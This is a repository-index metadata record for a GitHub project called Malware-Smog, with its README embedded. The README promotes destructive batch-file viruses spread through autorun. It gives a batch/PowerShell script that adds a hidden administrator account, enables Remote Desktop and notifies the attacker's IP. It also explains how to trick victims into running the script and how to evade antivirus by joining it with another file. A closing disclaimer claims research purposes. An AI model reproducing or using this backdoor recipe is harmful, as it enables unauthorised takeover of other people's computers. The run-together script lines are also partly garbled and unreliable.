{"id":19425985,"url":"https://github.com/palahsu/malware-smog","last_synced_at":"2025-06-11T10:37:52.516Z","repository":{"id":110770841,"uuid":"343055004","full_name":"palahsu/Malware-Smog","owner":"palahsu","description":"There are many powerful viruses 💀 that can damage your PC in a matter of seconds. Batch file virus to gain full access to another computer. This repo is a collection of fun little viruses that pack a mean punch!","archived":false,"fork":false,"pushed_at":"2021-03-07T04:17:26.000Z","size":168,"stargazers_count":36,"open_issues_count":0,"forks_count":11,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-25T05:15:33.612Z","etag":null,"topics":["batch-file","batch-script","batchfile","batchfiles","computer","malware","malware-analysis","malware-detection","malware-research","pc","trojan","virus","viruses","virustotal"],"latest_commit_sha":null,"homepage":"https://t.me/cyberclans","language":"Batchfile","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/palahsu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-02-28T08:23:35.000Z","updated_at":"2025-01-30T12:53:17.000Z","dependencies_parsed_at":"2023-04-22T18:45:05.069Z","dependency_job_id":null,"html_url":"https://github.com/palahsu/Malware-Smog","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/palahsu%2FMalware-Smog","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/palahsu%2FMalware-Smog/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/palahsu%2FMalware-Smog/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/palahsu%2FMalware-Smog/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/palahsu","download_url":"https://codeload.github.com/palahsu/Malware-Smog/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/palahsu%2FMalware-Smog/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259247175,"owners_count":22828195,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["batch-file","batch-script","batchfile","batchfiles","computer","malware","malware-analysis","malware-detection","malware-research","pc","trojan","virus","viruses","virustotal"],"created_at":"2024-11-10T14:05:34.432Z","updated_at":"2025-06-11T10:37:52.486Z","avatar_url":"https://github.com/palahsu.png","language":"Batchfile","funding_links":[],"categories":[],"sub_categories":[],"readme":"# MalwareSmog\n\nIn this file, There are many powerful viruses 💀 that can damage your PC in a matter of seconds.\nThis repo is a collection of fun little viruses that pack a mean punch! If you know anything about hacking, you will know that batch files are usually a stigma of the hacking world, most of the tutorials will show you how to create a \"virus\" that is nothing but empty and the creator can achieve nothing but laughter, which is okay, but those camouflage won't be helpful if you want to do some real permanent damage.\n\n## Features\n- Shutdowns\n- Crashespc\n- Disablenet\n- System Meltdown\n- Blue Screen Fake\n- Kill USB\n- Pc Optimize\n- More Malware\n\nPlease, Note that the above mentioned viruses make use of the  autorun.inf  file to exploit the autorun feature and can easily infect a windows machine and their effect can be devistating. And There are two PC Optimizer Trojan!\nEach .bat file can potencially destroy a PC if it's run individually. I have set them all to autorun, ensuring a non recoverable end result.\n\n\n    For an additional virus that is unlinked and unaffiliated with the .bat set please see the file named!\n    Complete_viruscode_Pascal.\n_____________________________________________________________________________________________________________________________\n\nLet's try to make an actual batch file virus to gain full access to another computer.\nNOTE: The user is going to have to be tricked into opening a file that requires admin access.\n\t\t\t\nThe first step is to open notepad and type in:\n\n    @echo offnet user winsystem winsystem /addnet localgroup administrators winsystem /add powershell set-executionpolicy \n\n    unrestrictedpowershell $path = 'HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList' \n\n    powershell New-Item $path -Force | New-ItemProperty -Name winsystem -Value 0 -PropertyType DWord -Force reg add \n\n    \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\n    msg \u003cinsert your IP here\u003e Its ready.\n\t\t\n## How it Works\n\n   - The first line creates a new user called winsystem with the password winsystem.\n   - The second line adds the new user as an admin.\n   - The third line allows PowerShell scripts to run.\n   - The fourth and fifth lines hide the user from the Log in screen.\n   - The sixth line allows RDP (Remote Desktop Protocol).\n   - The seventh line sends the IP address that is imputed the message \"Its ready.\"\n\nREMEMBER: When the box opens DO NOT CLOSE IT! Copy down the computer name, open cmd, and type: ping \u003cthe computer name you copied down\u003e.\n\nThats all! As soon as you get the IP, Copy it and input it into RDP and log in as winsystem.\n\nNOTE: Replace the items in \u003c \u003e as the items specified (duh). This may be detected by antivirus, but if you join the regular .bat file with a different file a Trojan can be made with low detection rates.\n\t\t\n# ⚠️Note\nRemember, that all responsibilities are at your own risk.\nPlease use it only for research purposes. Do not share \u0026 store this on Your PC!\nSome file Modified by Unknown! Some file is not tested.\n\nFor any kind of help, support, payment, donate, suggestion and request ask me on Gmail / Telegram:\n\n\u003ca href=\"https://t.me/CyberClans\"\u003e\u003cimg src=\"https://img.shields.io/badge/Telegram-Group%20Telegram%20Join-blue.svg?logo=telegram\"\u003e\u003c/a\u003e\n\n## Follow\n\u003cp align=\"left\"\u003e\n\u003ca href=\"https://github.com/palahsu\"\u003e\u003cimg src=\"https://img.shields.io/badge/GitHub-Follow%20on%20GitHub-inactive.svg?logo=github\"\u003e\u003c/a\u003e\n\u003c/p\u003e\u003cp align=\"left\"\u003e\n\u003ca href=\"https://www.facebook.com/aduri.knox01/\"\u003e\u003cimg src=\"https://img.shields.io/badge/Facebook-Follow%20on%20Facebook-blue.svg?logo=facebook\"\u003e\u003c/a\u003e\n\u003c/p\u003e\u003cp align=\"left\"\u003e\n\u003ca href=\"https://t.me/AD0000000\"\u003e\u003cimg src=\"https://img.shields.io/badge/Telegram-Contact%20Telegram%20Profile-blue.svg?logo=telegram\"\u003e\u003c/a\u003e\n\u003c/p\u003e\u003cp align=\"left\"\u003e \n\n\u003e **Disclaimer**\u003ca name=\"disclaimer\" /\u003e: Please note that this is a research project. I am by no means responsible for any usage of this tool. Use it on your behalf. I am not responsible if your accounts are banned due to extensive use of this tool. I am not responsible for any damages, this scripts and tools only for testing purpose. Everything here in this repository has been made for educational purposes, and/or ran in a controlled testing environment only. I do ***NOT*** enourage people to do something like this themselves/to themselves. ***NEVER*** use malware, or anything that is, but no limited to, malware, anything remotely capable of destroying computers, or even \"joke programs\" *on your own or other people's computers*, not even with their consent, as this can have bad, unforeseen consequences. \nBe careful not to infect yourself when accessing and experimenting with malicious software!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpalahsu%2Fmalware-smog","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpalahsu%2Fmalware-smog","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpalahsu%2Fmalware-smog/lists"}